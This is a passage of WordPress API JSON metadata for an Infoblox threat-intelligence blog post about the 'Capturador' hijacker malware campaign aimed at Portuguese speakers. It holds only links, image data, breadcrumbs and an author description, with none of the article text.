Report","isPartOf":{"@id":"https:\/\/www.infoblox.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#primaryimage"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#primaryimage"},"thumbnailUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-image-21.jpg","datePublished":"2021-09-02T23:02:08+00:00","dateModified":"2024-08-07T19:19:20+00:00","description":"nfoblox has observed a new malware campaign that acts as a hijacker. We believe the campaign is targeted towards speakers of Portuguese. Learn more.","breadcrumb":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#primaryimage","url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-image-21.jpg","contentUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-image-21.jpg","width":612,"height":343,"caption":"Cyber crime abstract concept. 3D shape and contour of skull icon on digital background. Computer attack and digital pirate symbol animation."},{"@type":"BreadcrumbList","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.infoblox.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Infoblox Threat Intel","item":"https:\/\/www.infoblox.com\/blog\/category\/threat-intelligence\/"},{"@type":"ListItem","position":3,"name":"Malicious Activity Reports","item":"https:\/\/www.infoblox.com\/blog\/category\/threat-intelligence\/malicious-activity-reports\/"},{"@type":"ListItem","position":4,"name":"New Malware: Capturador Hijacker"}]},{"@type":"WebSite","@id":"https:\/\/www.infoblox.com\/blog\/#website","url":"https:\/\/www.infoblox.com\/blog\/","name":"infoblox.com\/blog\/","description":"","publisher":{"@id":"https:\/\/www.infoblox.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.infoblox.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.infoblox.com\/blog\/#organization","name":"Infoblox","url":"https:\/\/www.infoblox.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/infoblox-logo-2.svg","contentUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/infoblox-logo-2.svg","width":137,"height":30,"caption":"Infoblox"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/person\/b6aed8965e3298a0817c16d32c0a67ae","name":"Infoblox Threat Intel","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","url":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","contentUrl":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","caption":"Infoblox Threat Intel"},"description":"Infoblox Threat Intel is the leading creator of original DNS threat intelligence, distinguishing itself in a sea of aggregators. What sets us apart? Two things: mad DNS skills and unparalleled visibility. DNS is notoriously tricky to interpret and hunt from, but our deep understanding and unique access to the internet's inner workings allow us to track down threat actors that others can't see. We're proactive, not just defensive, using our insights to disrupt cybercrime where it begins. We also believe in sharing knowledge to support the broader security community by publishing detailed research and releasing indicators on GitHub. In addition, our intel is seamlessly integrated into our Infoblox Protective DNS solutions, so customers automatically get its benefits, along with ridiculously low false positive rates.","url":"https:\/\/www.infoblox.com\/blog\/author\/infoblox-threat-intel\/"}]}},"_links":{"self":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/6947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/users\/397"}],"replies":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/comments?post=6947"}],"version-history":[{"count":4,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/6947\/revisions"}],"predecessor-version":[{"id":6958,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/6947\/revisions\/6958"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/media\/6727"}],"wp:attachment":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/media?parent=6947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/categories?post=6947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/tags?post=6947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}